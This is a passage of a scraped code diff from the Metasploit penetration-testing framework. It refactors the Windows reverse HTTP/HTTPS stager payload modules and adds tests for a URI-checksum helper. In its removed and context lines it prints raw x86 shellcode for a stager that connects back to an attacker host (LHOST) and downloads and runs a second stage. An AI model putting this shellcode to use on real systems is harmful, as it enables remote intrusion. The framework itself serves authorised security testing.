"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
|
|
||||||
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
|
|
||||||
"\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
|
|
||||||
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" +
|
|
||||||
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" +
|
|
||||||
"\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" +
|
|
||||||
"\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" +
|
|
||||||
"\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" +
|
|
||||||
"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" +
|
|
||||||
"\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" +
|
|
||||||
"\xFF\xFF"
|
|
||||||
}
|
|
||||||
))
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
|
||||||
#
|
|
||||||
def stage_over_connection?
|
|
||||||
false
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Generate the first stage
|
|
||||||
#
|
|
||||||
def generate
|
|
||||||
p = super
|
|
||||||
i = p.index("/12345\x00")
|
|
||||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
|
||||||
p[i, u.length] = u
|
|
||||||
|
|
||||||
lhost = datastore['LHOST'] || '127.127.127.127'
|
|
||||||
if Rex::Socket.is_ipv6?(lhost)
|
|
||||||
lhost = "[#{lhost}]"
|
|
||||||
end
|
|
||||||
|
|
||||||
p + lhost + "\x00"
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
|
||||||
#
|
|
||||||
def wfs_delay
|
|
||||||
20
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -6,14 +6,16 @@
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_https'
|
require 'msf/core/handler/reverse_https'
|
||||||
|
require 'msf/core/payload/windows/reverse_https'
|
||||||
|
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
|
||||||
CachedSize = 327
|
CachedSize = 326
|
||||||
|
|
||||||
include Msf::Payload::Stager
|
include Msf::Payload::Stager
|
||||||
include Msf::Payload::Windows
|
include Msf::Payload::Windows
|
||||||
|
include Msf::Payload::Windows::ReverseHttps
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
|
@ -24,64 +26,7 @@ module Metasploit3
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Handler' => Msf::Handler::ReverseHttps,
|
'Handler' => Msf::Handler::ReverseHttps,
|
||||||
'Convention' => 'sockedi https',
|
'Convention' => 'sockedi https'))
|
||||||
'Stager' =>
|
|
||||||
{
|
|
||||||
'Offsets' =>
|
|
||||||
{
|
|
||||||
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
|
|
||||||
# 'EXITFUNC' => [ 260, 'V' ],
|
|
||||||
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
|
|
||||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
|
|
||||||
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
|
|
||||||
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
|
|
||||||
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
|
|
||||||
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
|
|
||||||
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
|
|
||||||
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
|
|
||||||
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
|
|
||||||
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
|
|
||||||
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
|
|
||||||
"\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
|
|
||||||
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" +
|
|
||||||
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" +
|
|
||||||
"\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
|
|
||||||
"\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" +
|
|
||||||
"\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" +
|
|
||||||
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" +
|
|
||||||
"\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" +
|
|
||||||
"\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" +
|
|
||||||
"\x5F\xE8\x7B\xFF\xFF\xFF"
|
|
||||||
|
|
||||||
}
|
|
||||||
))
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
|
||||||
#
|
|
||||||
def stage_over_connection?
|
|
||||||
false
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Generate the first stage
|
|
||||||
#
|
|
||||||
def generate
|
|
||||||
p = super
|
|
||||||
i = p.index("/12345\x00")
|
|
||||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
|
|
||||||
p[i, u.length] = u
|
|
||||||
p + datastore['LHOST'].to_s + "\x00"
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
|
||||||
#
|
|
||||||
def wfs_delay
|
|
||||||
20
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -6,7 +6,7 @@
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_https'
|
require 'msf/core/handler/reverse_https'
|
||||||
|
#require 'msf/core/payload/windows/x64/reverse_https'
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
|
||||||
|
|
|
@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
|
||||||
subject(:dummy_object) { DummyClass.new }
|
subject(:dummy_object) { DummyClass.new }
|
||||||
|
|
||||||
it { should respond_to :generate_uri_checksum}
|
it { should respond_to :generate_uri_checksum}
|
||||||
|
it { should respond_to :generate_uri_checksum_with_length}
|
||||||
it { should respond_to :process_uri_resource}
|
it { should respond_to :process_uri_resource}
|
||||||
|
|
||||||
describe '#generate_uri_checksum' do
|
describe '#generate_uri_checksum' do
|
||||||
|
@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
describe '#generate_uri_checksum_with_length' do
|
||||||
|
[0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value|
|
||||||
|
[5,30,50,100,127].each do |uri_length|
|
||||||
|
it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do
|
||||||
|
uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length)
|
||||||
|
expect(Rex::Text.checksum8(uri_string)).to eq checksum_value
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
describe '#process_uri_resource' do
|
describe '#process_uri_resource' do
|
||||||
context 'when passed a value for INITW' do
|
context 'when passed a value for INITW' do
|
||||||
let(:uri) { "/7E37v"}
|
let(:uri) { "/7E37v"}
|
||||||
|
|
Loading…
Reference in New Issue